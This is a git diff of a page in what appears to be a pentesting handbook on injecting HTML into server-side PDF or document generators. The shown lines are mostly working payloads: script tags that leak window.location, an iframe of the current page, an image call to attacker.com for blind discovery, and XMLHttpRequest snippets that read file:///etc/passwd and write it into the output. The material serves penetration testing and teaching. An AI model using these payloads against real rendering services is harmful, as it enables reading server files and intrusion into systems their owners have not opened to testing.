GitBook: [master] one page modified
parent
f822e925d0
commit
52c3234894
@ -13,8 +13,10 @@ Also, note that in a regular exploitation you will be **able to see/download the
|
|||||||
### Discovery
|
### Discovery
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
<!-- Basic discovery, Write "test"-->
|
<!-- Basic discovery, Write somthing-->
|
||||||
<img src="x" onerror="document.write('test')" />
|
<img src="x" onerror="document.write('test')" />
|
||||||
|
<script>document.write(JSON.stringify(window.location))</script>
|
||||||
|
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
|
||||||
|
|
||||||
<!--Basic blind discovery, load a resource-->
|
<!--Basic blind discovery, load a resource-->
|
||||||
<img src="http://attacker.com"/>
|
<img src="http://attacker.com"/>
|
||||||
@ -65,7 +67,17 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
|
|||||||
x=new XMLHttpRequest;
|
x=new XMLHttpRequest;
|
||||||
x.onload=function(){document.write(btoa(this.responseText))};
|
x.onload=function(){document.write(btoa(this.responseText))};
|
||||||
x.open("GET","file:///etc/passwd");x.send();
|
x.open("GET","file:///etc/passwd");x.send();
|
||||||
</script>
|
</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
```markup
|
||||||
|
<script>
|
||||||
|
xhzeem = new XMLHttpRequest();
|
||||||
|
xhzeem.open("GET","file:///etc/passwd");
|
||||||
|
xhzeem.send();
|
||||||
|
xhzeem.onload = function(){document.write(this.responseText);}
|
||||||
|
xhzeem.onerror = function(){document.write('failed!')}
|
||||||
|
</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
|